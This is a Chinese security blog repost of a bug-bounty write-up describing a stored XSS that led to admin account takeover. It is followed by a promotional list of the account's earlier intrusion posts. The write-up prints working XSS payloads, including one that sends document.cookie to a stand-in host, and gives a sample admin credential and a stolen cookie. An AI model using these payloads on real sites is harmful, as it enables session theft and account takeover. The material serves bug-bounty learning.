最近快手网站发布了一个XSS挖洞专项，详情可以看一看本号今天发的“次条文章”

感兴趣的小伙伴可以参加快手网站挖洞活动，

既可以锻炼技术，又可以又奖金拿，

现在号主分享一篇网上的实战文章

”实战｜记一次5657美金赏金的XSS漏洞挖掘经历“以供学习。

我发现了一个存储的XSS漏洞，我可以通过窃取cookie升级为帐户接管。

我的payload目前需要最少的用户交互，只需单击即可。

如果我仍然找到一个更好的，一个没有用户交互的。

更新

这是我的payload： "><xss/id="1"/tabindex="1"/style="font-size:%20100px"/autofocus/onfocusin="confirm%601%60">

与cookie一起消失的payload： "><xss/id="1"/tabindex="1"/style="font-size:%20100px"/autofocus/onfocusin="window.location.href='https://example.com?cookie='%2bdocument.cookie">

漏洞复现

访问/book-appointment.html并填写所有必填字段，然后单击预订预约。

接下来，复制预约ID并访问/yourappointments.php。

粘贴之前复制的ID并检索预约。

之后，向下滚动并单击取消预约。确保您拦截了此请求。

使用以下有效载荷添加消息：

"><xss/id="1"/tabindex="1"/onfocusin="window.location.href='https://example.com?cookie='%2bdocument.cookie">

您通常会收到一个确认框，确认您的预约已取消，单击确定。接下来，访问/login.php并使用提供的凭据登录：drAdmin:s2Wpx5zfUvlSZhspJ。

导航到/drpanel/cancelled.php，然后单击上次取消的预约。

你会看到我们被重定向到https://example.com/?cookie=drps=e7340a3ab0c53934aa368ed55，我们的cookie在cookie参数中。即使管理员注销，此cookie也可以轻松重用。这是因为cookie不会过期。

影响

我能够通过取消我们的预约并包含一条消息来接管一个管理员帐户。

背景

我花了一些时间才找到这个payload，我首先尝试了一些基本的html标签，并迅速发布了大多数常见的标签被阻止。因为我们不允许使用任何自动化工具，我只是去尝试了自定义标签。

这起作用了：我以为<xss/contenteditable/autofocus/onfocus="">会起作用，但由于onfocus事件处理程序而没有。

这意味着我们必须找到一个具有用户交互的。

这就是我如何通过focusin，这个事件处理程序没有被删除，我再次离实现存储的XSS又近了一步：

在那之后，我很快得到了一个有效的payload。

因为cookie不是httpOnly，我选择了窃取cookie，因为这是实现帐户接管的最简单方法！

最后获得的漏洞赏金：

5,000美元+657美元（奖金）

原文 ：https://cloud.tencent.com/developer/article/2315122

网络靶场思维导图

资料获取
回复“电子书”获取web渗透、CTF电子书:
回复“视频教程”获取渗透测试视频教程;  
回复“内网书籍”获取内网学习书籍;        
回复“CTF工具”获取渗透、CTF全套工具;
回复“内网渗透”；获取内网渗透资料;
回复“护网”；获取护网学习资料 ;
回复“python”,获取python视频教程；
回复“java”，获取Java视频教程;
回复“go”，获取go视频教程
知识星球

欢迎加入99米/年，平均每天2毛7分钱，学习网络安全一整年。

▶【渗透实战系列】|52-记一次"91"站点渗透

▶【渗透实战系列】51|- 一次BC站点的GetShell过程

▶【渗透实战系列】50|- Log4j打点后与管理员斗智斗勇

▶【渗透实战系列】49|-实战某高校的一次挖矿病毒的应急处置

▶【渗透实战系列】|48-一次内网渗透

▶【渗透实战系列】|47-记一次对某鱼骗子卖家的溯源

▶【渗透实战系列】|46-渗透测试：从Web到内网

▶【渗透实战系列】|45-记一次渗透实战-代码审计到getshell

▶【渗透实战系列】|44-记一次授权渗透实战（过程曲折，Java getshell）

▶【渗透实战系列】|43-某次通用型漏洞挖掘思路分享

▶【渗透实战系列】|42-防范诈骗，记一次帮助粉丝渗透黑入某盘诈骗的实战

▶【渗透实战系列】|41-记一次色*情app渗透测试

▶【渗透实战系列】|40-APP渗透测试步骤（环境、代理、抓包挖洞）

▶【渗透实战系列】|39-BC渗透的常见切入点（总结）

▶【渗透实战系列】|38-对某色情直播渗透

▶【渗透实战系列】|37-6年级小学生把学校的网站给搞了！

▶【渗透实战系列】|36-一次bc推广渗透实战

▶【渗透实战系列】|35-旁站信息泄露的dedecms站点渗透

▶【渗透实战系列】|34-如何用渗透思路分析网贷诈骗链

▶【渗透实战系列】|33-App渗透 ,由sql注入、绕过人脸识别、成功登录APP

▶【渗透实战系列】|32-FOFA寻找漏洞，绕过杀软拿下目标站

▶【渗透实战系列】|31-记一次对学校的渗透测试

▶【渗透实战系列】|30-从SQL注入渗透内网（渗透的本质就是信息搜集）

▶【渗透实战系列】|29-实战|对某勒索APP的Getshell

▶【渗透实战系列】|28-我是如何拿下BC站的服务器

▶【渗透实战系列】|27-对钓鱼诈骗网站的渗透测试（成功获取管理员真实IP）

▶【渗透实战系列】|26一记某cms审计过程(步骤详细)

▶【渗透实战系列】|25一次从 APP 逆向到 Getshell 的过程

▶【渗透实战系列】|24-针对CMS的SQL注入漏洞的代码审计思路和方法

▶【渗透实战系列】|23-某菠菜网站渗透实战

▶【渗透实战系列】|22-渗透系列之打击彩票站

▶【渗透实战系列】|21一次理财杀猪盘渗透测试案例

▶【渗透实战系列】|20-渗透直播网站

▶【渗透实战系列】|19-杀猪盘渗透测试

▶【渗透实战系列】|18-手动拿学校站点 得到上万人的信息（漏洞已提交）

▶【渗透实战系列】|17-巧用fofa对目标网站进行getshell

▶【渗透实战系列】|16-裸聊APP渗透测试

▶【渗透实战系列】|15-博彩网站（APP）渗透的常见切入点

▶【渗透实战系列】|14-对诈骗（杀猪盘）网站的渗透测试

▶【渗透实战系列】|13-waf绕过拿下赌博网站

▶【渗透实战系列】|12 -渗透实战， 被骗4000花呗背后的骗局

▶【渗透实战系列】|11 - 赌博站人人得而诛之

▶【渗透实战系列】|10 - 记某色X商城支付逻辑漏洞的白嫖（修改价格提交订单）

▶【渗透实战系列】|9-对境外网站开展的一次web渗透测试（非常详细，适合打战练手）

▶【渗透实战系列】|8-记一次渗透测试从XSS到Getshell过程（详细到无语）

▶【渗透实战系列】|7-记一次理财杀猪盘渗透测试案例

▶【渗透实战系列】|6- BC杀猪盘渗透一条龙

▶【渗透实战系列】|5-记一次内衣网站渗透测试

▶【渗透实战系列】|4-看我如何拿下BC站的服务器

▶【渗透实战系列】|3-一次简单的渗透

▶【渗透实战系列】|2-记一次后门爆破到提权实战案例

▶【渗透实战系列】|1一次对跨境赌博类APP的渗透实战（getshell并获得全部数据）

长按-识别-关注

Hacking黑白红

一个专注信息安全技术的学习平台

点分享

点收藏

点点赞

点在看

原文始发于微信公众号（Hacking黑白红）：【渗透实战系列】|53-记一次3万多赏金的XSS漏洞挖掘经历